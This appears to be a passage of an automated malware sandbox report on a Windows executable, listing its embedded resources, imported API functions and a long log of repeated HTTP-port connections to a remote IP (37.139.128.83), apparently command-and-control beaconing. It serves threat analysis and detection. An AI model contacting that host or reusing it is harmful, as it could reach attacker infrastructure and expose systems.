                                                    RT_ICON0x3f37300x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States
                                                    RT_ICON0x3f79580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                    RT_ICON0x3f9f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                    RT_ICON0x3fafa80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                    RT_ICON0x3fbe500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                    RT_ICON0x3fc7d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                    RT_ICON0x3fd0800x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                    RT_ICON0x3fd6e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                    RT_ICON0x3fdc500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                    RT_ICON0x3fe0b80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                    RT_ICON0x3fe3a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                    RT_DIALOG0x3fe4c80x100dataEnglishUnited States
                                                    RT_DIALOG0x3fe5c80x11cdataEnglishUnited States
                                                    RT_DIALOG0x3fe6e80xc4dataEnglishUnited States
                                                    RT_DIALOG0x3fe7b00x60dataEnglishUnited States
                                                    RT_GROUP_ICON0x3fe8100xd8dataEnglishUnited States
                                                    RT_MANIFEST0x3fe8e80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                    Imports

                                                    DLLImport
                                                    KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                    USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 20, 2023 13:16:46.897514105 CET4979280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:46.916491985 CET804979237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:46.916826963 CET4979280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:46.917243958 CET4979280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:46.943846941 CET804979237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:46.943917990 CET804979237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:46.943964958 CET804979237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:46.944006920 CET804979237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:46.944037914 CET4979280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:46.944081068 CET804979237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:46.944143057 CET4979280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:46.944204092 CET4979280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:52.480920076 CET804979237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:52.481168032 CET4979280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:56.963512897 CET4979280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:56.963851929 CET4979580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:56.981890917 CET804979237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:56.981976986 CET804979537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:56.982162952 CET4979580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:56.982340097 CET4979580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:57.030054092 CET804979537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:57.030136108 CET804979537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:57.030189991 CET804979537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:57.030237913 CET804979537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:57.030291080 CET804979537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:16:57.030379057 CET4979580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:57.030380011 CET4979580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:16:57.030443907 CET4979580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:02.530766964 CET804979537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:02.531013012 CET4979580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:07.039050102 CET4979580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:07.039249897 CET4979880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:07.057694912 CET804979537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:07.057790995 CET804979837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:07.058085918 CET4979880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:07.058161974 CET4979880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:07.129527092 CET804979837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:07.129926920 CET4979880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:07.143343925 CET804979837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:07.143439054 CET804979837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:07.143497944 CET804979837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:07.143510103 CET4979880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:07.143595934 CET804979837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:07.143606901 CET4979880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:07.143656015 CET4979880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:07.143703938 CET4979880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:12.658093929 CET804979837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:12.658453941 CET4979880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:17.161452055 CET4979880192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:17.161731958 CET4980080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:17.179919958 CET804979837.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:17.179985046 CET804980037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:17.180273056 CET4980080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:17.180488110 CET4980080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:17.208664894 CET804980037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:17.208734035 CET804980037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:17.208784103 CET804980037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:17.208827019 CET804980037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:17.208869934 CET804980037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:17.208889008 CET4980080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:17.208889961 CET4980080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:17.208966970 CET4980080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:22.709000111 CET804980037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:22.709415913 CET4980080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:27.221820116 CET4980080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:27.222153902 CET4980180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:27.239955902 CET804980037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:27.240132093 CET804980137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:27.240246058 CET4980180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:27.240505934 CET4980180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:27.312999010 CET804980137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:27.319519997 CET804980137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:27.319586039 CET804980137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:27.319698095 CET4980180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:27.319760084 CET4980180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:27.336045980 CET804980137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:27.336110115 CET804980137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:27.336155891 CET804980137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:27.336225986 CET4980180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:27.336298943 CET4980180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:32.872137070 CET804980137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:32.872304916 CET4980180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:37.344167948 CET4980180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:37.344499111 CET4980480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:37.362550020 CET804980137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:37.362641096 CET804980437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:37.362831116 CET4980480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:37.362966061 CET4980480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:37.437429905 CET804980437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:37.437498093 CET804980437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:37.437544107 CET804980437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:37.437587023 CET804980437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:37.437632084 CET804980437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:37.437645912 CET4980480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:37.437716961 CET4980480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:37.437817097 CET4980480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:37.437818050 CET4980480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:42.944545031 CET804980437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:42.945274115 CET4980480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:47.451338053 CET4980480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:47.451711893 CET4980580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:47.469196081 CET804980437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:47.469358921 CET804980537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:47.469532013 CET4980580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:47.469768047 CET4980580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:47.492672920 CET804980537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:47.492774963 CET804980537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:47.492829084 CET804980537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:47.492837906 CET804980537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:47.492846966 CET804980537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:47.492887974 CET4980580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:47.492985964 CET4980580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:47.492985964 CET4980580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:53.016680002 CET804980537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:53.017091990 CET4980580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:57.511610985 CET4980580192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:57.511977911 CET4980680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:57.529975891 CET804980537.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:57.530036926 CET804980637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:57.530306101 CET4980680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:57.530489922 CET4980680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:57.574198008 CET804980637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:57.574271917 CET804980637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:57.574321985 CET804980637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:57.574364901 CET804980637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:57.574408054 CET804980637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:17:57.574467897 CET4980680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:57.574534893 CET4980680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:17:57.574613094 CET4980680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:03.079468966 CET804980637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:03.079658031 CET4980680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:07.587513924 CET4980680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:07.590075970 CET4981080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:07.605890989 CET804980637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:07.608428955 CET804981037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:07.608625889 CET4981080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:07.608877897 CET4981080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:07.643163919 CET804981037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:07.643179893 CET804981037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:07.643299103 CET804981037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:07.643312931 CET804981037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:07.643421888 CET4981080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:07.643440962 CET4981080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:07.643440962 CET4981080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:08.001169920 CET804981037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:08.001374006 CET4981080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:13.153027058 CET804981037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:13.153261900 CET4981080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:18.009469986 CET4981080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:18.009751081 CET4981180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:18.028038025 CET804981037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:18.028105974 CET804981137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:18.028309107 CET4981180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:18.028491020 CET4981180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:18.062808990 CET804981137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:18.062891960 CET804981137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:18.062947989 CET804981137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:18.062997103 CET804981137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:18.063051939 CET804981137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:18.063137054 CET4981180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:18.063137054 CET4981180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:18.063220978 CET4981180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:23.602072954 CET804981137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:23.602298975 CET4981180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:28.068234921 CET4981180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:28.068592072 CET4981280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:28.086720943 CET804981137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:28.086791039 CET804981237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:28.087094069 CET4981280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:28.087193966 CET4981280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:28.117830992 CET804981237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:28.117913008 CET804981237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:28.117969036 CET804981237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:28.118019104 CET804981237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:28.118046999 CET4981280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:28.118074894 CET804981237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:28.118171930 CET4981280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:28.118220091 CET4981280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:33.631720066 CET804981237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:33.632379055 CET4981280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:36.845438957 CET4981280192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:36.863487959 CET804981237.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:38.130460024 CET4981480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:38.148802996 CET804981437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:38.149136066 CET4981480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:38.149235964 CET4981480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:38.178752899 CET804981437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:38.178833008 CET804981437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:38.178886890 CET804981437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:38.178935051 CET804981437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:38.178965092 CET4981480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:38.178988934 CET804981437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:38.179054976 CET4981480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:38.179114103 CET4981480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:38.179160118 CET4981480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:43.694008112 CET804981437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:43.694276094 CET4981480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:48.188818932 CET4981480192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:48.189171076 CET4981680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:48.207257032 CET804981437.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:48.207386017 CET804981637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:48.207638979 CET4981680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:48.207734108 CET4981680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:48.283617020 CET804981637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:48.283715010 CET804981637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:48.283776999 CET804981637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:48.283837080 CET804981637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:48.283891916 CET804981637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:48.283987999 CET4981680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:48.283987999 CET4981680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:48.284074068 CET4981680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:53.797794104 CET804981637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:53.798151016 CET4981680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.295320034 CET4981680192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.295567036 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.314063072 CET804981637.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.314151049 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.314477921 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.314579010 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.372782946 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.372881889 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.372941971 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.372997999 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.372993946 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.372993946 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.373060942 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:18:58.373205900 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:18:58.373207092 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:03.899411917 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:03.899653912 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.386692047 CET4981780192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.387037992 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.404649019 CET804981737.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.404835939 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.405142069 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.405410051 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.439033985 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.439058065 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.439074993 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.439090967 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.439105988 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:08.439321995 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:08.439321995 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:13.954207897 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:13.954555035 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.446949959 CET4981980192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.447367907 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.465378046 CET804981937.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.465441942 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.465748072 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.465970039 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.525351048 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.525393963 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.525423050 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.525453091 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.525480986 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:18.525643110 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:18.525769949 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:24.026876926 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:24.027112007 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.539459944 CET4982080192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.539709091 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.558087111 CET804982037.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.558162928 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.558506966 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.558624983 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.602679014 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.602756977 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.602807999 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.602854967 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.602905989 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:28.602998018 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.602998018 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.602998018 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:28.603095055 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:34.110204935 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:34.110419035 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.614507914 CET4982180192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.614713907 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.632922888 CET804982137.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.632985115 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.633246899 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.633337021 CET4982380192.168.11.2037.139.128.83
                                                    Mar 20, 2023 13:19:38.664674044 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.664743900 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.664789915 CET804982337.139.128.83192.168.11.20
                                                    Mar 20, 2023 13:19:38.664835930 CET804982337.139.128.83192.168.11.20
